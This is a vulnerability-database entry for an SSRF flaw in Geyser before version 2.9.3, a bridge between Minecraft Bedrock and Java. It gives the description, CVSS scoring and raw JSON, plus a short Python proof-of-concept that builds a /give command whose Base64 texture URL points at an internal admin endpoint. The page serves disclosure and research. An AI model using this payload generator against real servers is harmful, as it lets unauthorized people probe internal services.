Security Vulnerability Report
中文
CVE-2026-42188 CVSS 2.4 LOW

CVE-2026-42188

Published: 2026-05-11 22:22:11
Last Modified: 2026-05-11 22:22:11
Source: [email protected]

Description

Geyser is a bridge between Minecraft: Bedrock Edition and Minecraft: Java Edition. Prior to 2.9.3, a server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints. This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client. This vulnerability is fixed in 2.9.3.

CVSS Details

CVSS Score
2.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Geyser < 2.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept for CVE-2026-42188 # This Python script generates a Minecraft /give command that triggers the SSRF. import base64 import json def generate_malicious_command(target_url): # Create the JSON structure for the texture texture_data = { "url": target_url } # Encode to Base64 (Minecraft texture format requirement) encoded_bytes = base64.b64encode(json.dumps(texture_data).encode("utf-8")) encoded_string = encoded_bytes.decode("utf-8") # Construct the /give command with NBT data # This gives the player a player_head with the malicious texture command = f'/give @p minecraft:player_head{{SkullOwner:{{Id:"IcyRex",Properties:{{textures:[{{Value:"{encoded_string}"}}]}}}}}}' return command if __name__ == "__main__": # Example: Targeting an internal admin panel or metadata service target = "http://127.0.0.1:8080/admin" print(f"Target: {target}") print("Run this command in the Minecraft server console or as an OP player:") print(generate_malicious_command(target))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42188", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:11.277", "lastModified": "2026-05-11T22:22:11.277", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Geyser is a bridge between Minecraft: Bedrock Edition and Minecraft: Java Edition. Prior to 2.9.3, a server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints. This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client. This vulnerability is fixed in 2.9.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/GeyserMC/Geyser/security/advisories/GHSA-xcfg-fcr5-gw9r", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.